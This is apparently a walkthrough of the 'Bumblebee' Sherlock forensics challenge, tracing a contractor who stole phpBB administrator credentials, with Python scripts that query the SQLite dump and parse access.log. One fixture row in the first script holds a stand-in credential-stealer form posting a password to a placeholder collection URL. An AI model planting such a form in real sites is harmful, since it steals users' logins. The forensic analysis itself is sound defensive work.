In this post, I would like to share a walkthrough of the Sherlock challenge Bumblebee, which is rated Easy difficulty.
- Introduction of Bumblebee Challenge
- Case Scenario on the Bumblebee
- 1) What was the username of the external contractor?
- 2) What IP address did the contractor use to create their account?
- 3) What is the post_id of the malicious post that the contractor made?
- 4) What is the full URI that the credential stealer sends its data to?
- 5) When did the contractor log into the forum as the administrator? (UTC)
- 6) In the forum there are plaintext credentials for the LDAP connection, what is the password?
- 7) What is the user agent of the Administrator user?
- 8) What time did the contractor add themselves to the Administrator group? (UTC)
- 9) What time did the contractor download the database backup? (UTC)
- 10) What was the size in bytes of the database backup as stated by access.log?
Introduction of Bumblebee Challenge
In this challenge, you will take on the role of a Digital Forensics and Incident Response (DFIR) specialist investigating a security breach involving an external contractor who accessed Forela’s internal forum. By analyzing the forum logs and an SQLite3 database dump, your task is to uncover how the intruder used the Guest WiFi to obtain administrative credentials. This exercise assesses your skills in forensic data analysis, tracking digital footprints, and identifying the perpetrator.
Case Scenario on the Bumblebee
An external contractor has accessed the internal forum here at Forela via the Guest WiFi and they appear to have stolen credentials for the administrative user! We have attached some logs from the forum and a full database dump in sqlite3 format to help you in your investigation.
First, download the Bumblebee archive to your machine.
The zip archive contains only two files, the forum's access.log and the sqlite3 database dump, and between them they hold everything needed to answer the questions.
Open the database with the sqlite3 command-line client: sqlite3 <file>
The dump contains a large number of tables (the .tables command lists them), so reviewing every one by hand would take a long time; it is better to go straight to the tables relevant to each question.
1) What was the username of the external contractor?
To proceed, we first need to know the schema of the tables we are interested in (the .schema command in sqlite3 prints it).
The user accounts live in the phpbb_users table, so we can list them together with the address each account was registered from by running “select username, user_ip from phpbb_users;”. The raw sqlite3 output is hard to read in this format, however.
A GUI makes the tables much easier to browse, so we install DB Browser for SQLite (sqlitebrowser) with the command below:
sudo apt install sqlitebrowser
Sqlitebrowser interface
Start the application and open the database file in it; the interface should look like the screenshot below.
With the phpbb_users table in view, the contractor's username is the entry highlighted above.
2) What IP address did the contractor use to create their account?
The same phpbb_users row that gave us the username in Question 1 also holds the user_ip column, the address the account was created from, highlighted above.
3) What is the post_id of the malicious post that the contractor made?
Browsing the phpbb_posts table, the malicious post made by the contractor is the one with post_id 9.
4) What is the full URI that the credential stealer sends its data to?
Its post_text cell contains what looks like a complete HTML page rather than a normal forum post.
Reading the HTML source carefully, one URL stands out: the address the credential stealer sends the captured data to, highlighted above.
5) When did the contractor log into the forum as the administrator? (UTC)
For this question we turn to access.log, which records every request made to the forum.
The log contains a large number of lines, so reading it from top to bottom would take a long time.
We can narrow it down by filtering for the administrator-related requests, for example with “cat access.log | grep “admin”“ (or simply grep "admin" access.log). Note that the timestamp in each Apache log line carries a timezone offset after the time; the question asks for UTC, so apply that offset when the log is not already recorded in +0000.
6) In the forum there are plaintext credentials for the LDAP connection, what is the password?
The forum's settings, including the LDAP authentication settings, are stored in the phpbb_config table as config_name/config_value pairs, so that is where to look for this question.
Scan the config_name column carefully for the LDAP-related entries.
The LDAP password is stored there in plaintext alongside the bind user and server settings.
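The database side of the investigation (Questions 1 to 4 and 6) boils down to three queries against phpbb_users, phpbb_posts and phpbb_config. The script below, an added example and not part of the original walkthrough, runs those queries with Python's built-in sqlite3 module so the output is readable without a GUI. When given a path on the command line it opens that file; otherwise it builds an in-memory database from constructed sample rows. The column names follow the phpBB 3.x schema, but the usernames, IPs, URLs and LDAP values are invented placeholders and are not the challenge's answers.

```python
import re
import sqlite3
import sys

# Minimal subset of the phpBB 3.x schema touched by the walkthrough.
SAMPLE_SCHEMA = """
CREATE TABLE phpbb_users (user_id INTEGER, username TEXT, user_ip TEXT, user_regdate INTEGER);
CREATE TABLE phpbb_posts (post_id INTEGER, poster_id INTEGER, post_time INTEGER, post_text TEXT);
CREATE TABLE phpbb_config (config_name TEXT, config_value TEXT);
"""

# Constructed sample rows: placeholders only, not the challenge's data.
SAMPLE_ROWS = [
    ("INSERT INTO phpbb_users VALUES (?,?,?,?)", [
        (2, "admin", "10.0.0.5", 1680000000),
        (48, "contractor-example", "10.10.0.23", 1680100000),
    ]),
    ("INSERT INTO phpbb_posts VALUES (?,?,?,?)", [
        (1, 2, 1680000100, "Welcome to the forum."),
        (9, 48, 1680100500,
         '<form action="http://example.invalid/collect.php">'
         '<input name="password"></form>'),
    ]),
    ("INSERT INTO phpbb_config VALUES (?,?)", [
        ("sitename", "Forela Forum"),
        ("ldap_server", "ldap.example.invalid"),
        ("ldap_user", "cn=svc-forum,dc=example,dc=invalid"),
        ("ldap_password", "sample-not-the-real-one"),
    ]),
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def open_sample_db():
    """Build the in-memory stand-in for the sqlite3 dump."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    for sql, rows in SAMPLE_ROWS:
        conn.executemany(sql, rows)
    return conn


def users_with_ip(conn):
    """Q1/Q2: every account with the IP it was registered from, oldest first."""
    return conn.execute(
        "SELECT user_id, username, user_ip FROM phpbb_users ORDER BY user_regdate"
    ).fetchall()


def posts_with_urls(conn):
    """Q3/Q4: posts whose body carries an outbound URL. A credential stealer
    pasted into a post has to send its loot somewhere, so it shows up here."""
    found = []
    for post_id, poster_id, text in conn.execute(
        "SELECT post_id, poster_id, post_text FROM phpbb_posts"
    ):
        urls = URL_RE.findall(text or "")
        if urls:
            found.append((post_id, poster_id, urls))
    return found


def ldap_settings(conn):
    """Q6: phpBB keeps the LDAP bind settings as plain config_name/config_value rows."""
    return dict(conn.execute(
        "SELECT config_name, config_value FROM phpbb_config WHERE config_name LIKE 'ldap%'"
    ))


if __name__ == "__main__":
    db = sqlite3.connect(sys.argv[1]) if len(sys.argv) > 1 else open_sample_db()
    print("users:", users_with_ip(db))
    for post_id, poster_id, urls in posts_with_urls(db):
        print(f"post_id={post_id} poster_id={poster_id} urls={urls}")
    print("ldap:", ldap_settings(db))
```

Cross-check the poster_id of the flagged post against the user_id from the first query: the post, the account and the registration IP should all point at the same contractor.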
7) What is the user agent of the Administrator user?
The user agent is the last quoted field of each access.log line, so it can be read directly from the administrator's requests in the output of the previous grep.
8) What time did the contractor add themselves to the Administrator group? (UTC)
This time, adjust the grep pattern from the previous step so it matches the request that changed the group membership rather than the login, and read the timestamp (converted to UTC) from that line.
9) What time did the contractor download the database backup? (UTC)
phpBB database backups are normally saved as <filename>.sql.gz, so grep access.log for .sql.gz and read the timestamp from the line that requested the backup file.
10) What was the size in bytes of the database backup as stated by access.log?
The same line that requests the backup file also records the size of the response: in the combined log format it is the number immediately after the HTTP status code, which gives the backup size in bytes.
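Questions 5 and 7 to 10 all come down to pulling the right fields (UTC timestamp, path, response size, user agent) out of access.log lines. The script below is an added example, not code from the original walkthrough: it parses Apache combined-format lines, normalises the timestamp to UTC using the offset in the line, and exposes the filters the questions need. The embedded log lines are constructed for the example, the ACP paths are assumed phpBB admin URLs, and none of the values are the challenge's answers.

```python
import re
from datetime import datetime, timezone

# Constructed sample lines in Apache combined format. IPs, times, paths,
# sizes and user agents are invented for this example.
SAMPLE_LOG = """\
10.10.0.23 - - [26/Apr/2023:10:02:11 +0100] "POST /ucp.php?mode=login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Sample/1.0"
10.10.0.23 - - [26/Apr/2023:10:04:45 +0100] "GET /adm/index.php?i=acp_groups&mode=manage HTTP/1.1" 200 1887 "-" "Mozilla/5.0 (X11; Linux x86_64) Sample/1.0"
10.10.0.23 - - [26/Apr/2023:10:05:02 +0100] "POST /adm/index.php?i=acp_groups&mode=manage&action=add HTTP/1.1" 200 2304 "-" "Mozilla/5.0 (X11; Linux x86_64) Sample/1.0"
10.10.0.23 - - [26/Apr/2023:10:09:30 +0100] "GET /adm/index.php?i=acp_database&mode=backup&action=download&file=backup_example.sql.gz HTTP/1.1" 200 34817 "-" "Mozilla/5.0 (X11; Linux x86_64) Sample/1.0"
10.0.0.5 - - [26/Apr/2023:11:00:00 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0) Sample/2.0"
"""

# ip ident user [timestamp] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Parse one combined-format line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # The bracketed timestamp carries its own offset; %z reads it and
    # astimezone() converts to UTC, which is what the questions ask for.
    entry["utc"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
    entry["status"] = int(entry["status"])
    entry["size"] = None if entry["size"] == "-" else int(entry["size"])
    return entry


def parse_log(text):
    return [e for e in (parse_line(line) for line in text.splitlines()) if e]


def requests_matching(entries, needle, ip=None):
    """Q5/Q8: the grep equivalent, optionally restricted to one client IP."""
    return [e for e in entries if needle in e["path"] and (ip is None or e["ip"] == ip)]


def user_agents(entries, ip):
    """Q7: distinct user agents seen from one address."""
    return sorted({e["ua"] for e in entries if e["ip"] == ip})


def backup_downloads(entries):
    """Q9/Q10: requests for a .sql.gz file, with the UTC time and response size in bytes."""
    return [(e["utc"], e["path"], e["size"]) for e in entries if ".sql.gz" in e["path"]]


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for e in requests_matching(entries, "mode=login"):
        print("login:", e["utc"].isoformat(), e["ip"], e["ua"])
    for e in requests_matching(entries, "acp_groups"):
        print("group change:", e["utc"].isoformat(), e["path"])
    for when, path, size in backup_downloads(entries):
        print("backup:", when.isoformat(), path, f"{size} bytes")
```

To run it over the real file, replace SAMPLE_LOG with open("access.log").read(); the offset conversion is what stops a +0100 or -0500 log from being reported an hour or five off from the UTC answer the questions expect.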